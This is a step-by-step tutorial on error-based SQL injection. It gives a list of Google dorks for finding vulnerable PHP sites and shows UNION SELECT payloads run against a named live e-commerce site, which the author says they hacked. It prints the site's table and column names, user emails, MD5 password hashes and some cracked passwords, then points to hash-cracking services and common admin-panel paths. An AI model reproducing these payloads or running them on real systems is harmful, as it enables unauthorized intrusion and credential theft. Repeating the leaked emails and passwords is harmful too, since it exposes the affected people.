Error Based SQL Injection

  • Error based SQL injection takes advantage of poor error handling in web page processing. I’ll make this tutorial as friendly as possible.
    This will involve 5 major stages: 
    •	Finding the target
    •	Identifying database size i.e number of columns
    •	Extracting database tables
    •	Extracting database columns in target tables e.g. user table
    •	extracting data from database columns e.g. user account details 
    •	cracking passwords of user accounts. 
    
    Before we proceed it is important to know about SQL so that you can find which sql method woks if one fails:
    	Union Type: there are 2 types i.e. Union and Union all
    	Concat operators: These could be among : + , /**/, space, %09,%0a, %0D
    	Commentors: these could be : --,/*, ##
    	Group_concat- they are used to request information theycould be: group_concat(table_name),group_concat(column_name),group_concat(schema_name)
    More will be discussed in a later tutorial these are what you need t know for this one. 
    
    1.	FINDING THE TARGET
     To find the target on google you use “google dorks” i.e search terms that sieve out an architecture likely to have this vulnerability. Here are a few
    	allinurl:index.php?id=
    	allinurl:trainers.php?id=
    	allinurl:buy.php?category=
    	allinurl:article.php?ID=
    	allinurl:play_old.php?id=
    	allinurl:newsitem.php?num=
    	allinurl:readnews.php?id=
    	allinurl:top10.php?cat=
    	allinurl:historialeer.php?num=
    	allinurl:reagir.php?num=
    	allinurl:Stray-Questions-View.php?num=
    	allinurl:forum_bds.php?num=
    	allinurl:game.php?id=
    	allinurl:view_product.php?id=
    	allinurl:newsone.php?id=
    	allinurl:sw_comment.php?id=
    	allinurl:news.php?id=
    	allinurl:avd_start.php?avd=
    	allinurl:event.php?id=
    	allinurl:product-item.php?id=
    	allinurl:sql.php?id=
    	allinurl:news_view.php?id=
    	allinurl:select_biblio.php?id=
    	allinurl:humor.php?id=
    	allinurl:aboutbook.php?id=
    	allinurl:ogl_inet.php?ogl_id=
    	allinurl:fiche_spectacle.php?id=
    	allinurl:communique_detail.php?id=
    	allinurl:sem.php3?id=
    	allinurl:kategorie.php4?id=
    	allinurl:news.php?id=
    	allinurl:index.php?id=
    	allinurl:faq2.php?id=
    	allinurl:show_an.php?id=
    	allinurl:preview.php?id=
    	allinurl:loadpsb.php?id=
    	allinurl:opinions.php?id=
    	allinurl:spr.php?id=
    	allinurl:pages.php?id=
    	allinurl:announce.php?id=
    	allinurl:clanek.php4?id=
    	allinurl:participant.php?id=
    	allinurl:download.php?id=
    	allinurl:main.php?id=
    	allinurl:review.php?id=
    	allinurl:chappies.php?id=
    	allinurl:read.php?id=
    	allinurl:prod_detail.php?id=
    	allinurl:viewphoto.php?id=
    	allinurl:article.php?id=
    	allinurl:person.php?id=
    	allinurl:productinfo.php?id=
    	allinurl:showimg.php?id=
    	allinurl:view.php?id=
    	allinurl:website.php?id=
    	allinurl:hosting_info.php?id=
    	allinurl:gallery.php?id=
    	allinurl:rub.php?idr=
    	allinurl:view_faq.php?id=
    	allinurl:artikelinfo.php?id=
    	allinurl:detail.php?ID=
    	allinurl:index.php?=
    Just to clarify the dork used.
    inurl: -> is a search parameter in google so that it searches for results in the site's url.
    .php?5= -> is what i'm searching for in a url, SQL INJECTION works by adding a code after the = symbol. This is also commonly referred as a Dork.
    Now from the results just open the links in a new tab and add an apostrophe after the url (‘).  A vulnerable target will respond with something like: 
    “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near “LIMIT 1 ‘ at line 1”
    Note:
    You could also test the error by adding “'” after the url without the quotes also you could add a “” etc.
    Now that we have the victim we need to move on to stage 2:
    2.	IDENTIFYING THE DATABASE 
    For this stage we will use a few SQL commands. I will use a live target which I found and hacked for this tutorial. 
    The target is : http://www.styleconnection.co.ke/browse-items.php?id=23
    I want to identify the number of columns as the first thing. To do this we will use the order by clause until we get an error and that will mean the lower limit is the number f columns.
    http://www.styleconnection.co.ke/browse-items.php?id=23 order by 1—(no error)
    http://www.styleconnection.co.ke/browse-items.php?id=23 order by 2—(no error)
    http://www.styleconnection.co.ke/browse-items.php?id=23 order by 3—(no error)
    http://www.styleconnection.co.ke/browse-items.php?id=23 order by 4—(no error)
    http://www.styleconnection.co.ke/browse-items.php?id=23 order by 5—(error)
    
    Error reads :
    Unknown column '5' in 'order clause'
    Database therefore has four columns.
    For more fun now we also need to find columns we can query or extract data from they are called string columns. To do this we use the (-) negative quote and union select statement  to  get them. 
    So now we will have this url structured as below:
    The negative quote comes before the ph parameter so that you will have this as the information. 
    http://www.styleconnection.co.ke/browse-items.php?id=-23 union select 1,2,3,4—
    notice the – before 23 it is crucial. 
    
    In my case I got a number  “3” on the page this means that the column 3 can be used to give us the information we desire as a test lets get the mySQL database version. To do this we will replace the number 3 with @@version and have this : 
    http://www.styleconnection.co.ke/browse-items.php?id=-23 union select 1,2,@@version,4—
    And voila the mySQL version is displayed. 
    Now we move to stage 3 where the real injection starts and just to understand it I would advise you to look at the information_schema table in phpmyadmin to understand how we structure the rest. If you have wampp or xampp or lamp on your machine this can be accessed via http://localhost/phpmyadmin.
    The reason we use information_schema is because we don’t know the database and the information_schema holds information of all the databases on the server and their structure etc.
    3.	EXTRACTING DATABASE TABLES
    Extracting the database tables involves concat statements and now we want to get table name therefore we will use group_concat(table_name) to extract information from information schema. We will have a url like this: 
    
    http://www.styleconnection.co.ke/browse-items.php?id=-23 union select 1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()—
    
    notice the group_concat(table_name) is in the place of the number 3 as it is the column we can write commands to.  What follows after 4 is a constant that means in the tables of information schema we want information regarding tables in the database. 
    
    From my attack the webpage listed all the tables as below: 
    “tbl_cart,tbl_cartitems,tbl_cartstatus,tbl_categories,tbl_clientdetails,tbl_countries,tbl_deliverymethods,tbl_feedbacks,tbl_inventory,tbl_orders,tbl_orderstatus,tbl_paymentmethods,tbl_payments,tbl_paymentstatus,tbl_permits,tbl_products,tbl_productstatus,tbl_statistics,tbl_sysusers,tbl_tagitems,tbl_tags,tbl_usergroups,tbl_users,tbl_userstatus”
    
    4.	EXTRACTING DATABASE COLUMNS
    If you are feeling geeky don’t it gets better.  Now you can extract columns from all the databases but I prefer an easier way getting the full rights then going for the kill so I will only deal with table users so that I can become admin and have full control. The table to attack is tbl_users . just as a precaution I prefer to hide the table name when requesting the table name. To create hexadecimal equivalents I use hexjector or http://home2.paulschou.net/tools/xlate/ but you can use other services too if you like. 
    The value of tbl_users in hexadecimal is : 74626c5f7573657273 but we need to add the operator 0x before it (hexjector does this automatically) so it isn’t confused to be a plain string therefore we will have. 0x74626c5f7573657273 as the table name. to extract information via injection we will extract using group_concat(column_name) and instead of extracting from table schema is a database we will extract information from information schema where the table name is our table which in this case is tbl_users. So the url is going to be: 
    
    http://www.styleconnection.co.ke/browse-items.php?id=-23 union select 1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0x74626c5f7573657273—
    and woohoo we know the columns in that table by name: 
    
    result in my case:
    
    “UserId,Username,Password,GroupId,ActivationCode,StatusId”
    
    5.	EXTRACTING DATA FROM DATABASE COLUMNS
    Stop Salivating you are not home yet. We are almost there though now we just want the accounts since we know the fields in the table. We don’t need all columns we just need the username and password. When extracting specific data we use the operator 0x3a and group_concat(0x3a,fieldname) as the method.
    Here goes nothing :D ….. 
    
    http://www.styleconnection.co.ke/browse-items.php?id=-23 union select 1,2,group_concat(Username,0x3a,Password),4+from+tbl_users—
    and voila guess what : 
    
    000001:admin:2f103e6dc3675126bebf2386153b635b,
    000017:polycarp@websysltd.com:96e79218965eb72c92a549dd5a330112:111111
    000019:mtsumi@pwanitech.com:ec5cda6c87d4f3aa20c3781166a3b84d:pwanitech
    
    But I only need admin so now to get the password in plain English. 
    6.	CRACKING PASSWORDS
    The hash shown is a simple php pass md5 hash so let’s crack it using an online service it is faster than using offline method however if you want to you could crack them offline. If so you can use: 
    •	Hashcat gui
    •	John the ripper
    But I use an online service: http://www.md5decrypter.co.uk/
    Paste the hash verify you are not a bot and click decrypt hashes. And there you have it. Now find the admin area usually any of the following:
    /cp
    /admin
    /cms
    /administrator
    /admin.php
    /owner